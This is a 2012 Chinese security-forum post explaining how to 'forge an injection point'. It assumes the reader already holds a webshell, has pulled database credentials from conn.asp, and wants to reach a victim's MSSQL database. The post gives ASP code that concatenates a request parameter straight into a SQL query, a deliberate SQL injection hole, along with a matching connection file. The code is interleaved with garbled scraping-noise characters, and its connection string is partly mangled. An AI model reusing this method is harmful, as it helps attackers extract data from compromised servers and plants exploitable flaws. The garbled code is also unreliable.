中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
3 K* y; P% V' y# iASP/Visual Basic代码" ^2 W  v" a( [5 _# ^$ Z
<!--#include file="xx.asp"-->   
) B" n* V7 H. \  p8 R  a! S<%    & y6 {4 Q1 h& P& T
set rs=server.createobject("ADODB.recordset")    * {" }+ m7 i( p' |" V
id = request("id")   
4 |4 T/ i/ d+ d% }strSQL = "select * from admin where id=" & id    * V- C. J( V* q7 D. K
rs.open strSQL,conn,1,3      e" H( ~  r3 A; P' m1 n  f* Y3 O! p
rs.close   
! E8 }! t8 f1 @5 L; I( b%>  . `  O  a' G) i* }! D1 o
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
9 u4 [% e6 }* K9 x) R/ D+ ^然后就要构造一个连接数据库的文件了,代码如下:
( z( ~/ M  z( V* N2 RASP/Visual Basic代码% U2 v/ @6 f0 G4 x: v- j# w
<%            
) e8 q3 {* ]( d% |1 `" ^1 w2 mstrSQLServerName = "000.000.000.000"     '服务器名称或地址    . \/ Y. J9 @4 i4 M. Q9 [5 |8 A
strSQLDBUserName = "sqlname"         '数据库帐号   
1 Y) L3 _& y) r# a$ tstrSQLDBPassword = "sqlpass"         '数据库密码    0 g* `$ o0 f4 f
strSQLDBName = "sqldataname"           '数据库名称   
1 N2 Z& B" ?7 ~, N( @- X% N$ k: jSet conn = Server.CreateObject("ADODB.Connection")    8 g, a! Q% F4 {2 q$ F7 N8 f1 ]
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   + i. L' V5 L% b
conn.open strCon    % T. r7 t" ]  h  w5 h! `) S5 }
%>  ( O/ j  E% k/ e- e
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功; z# t( F; z. Y# Z5 @" t8 C





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2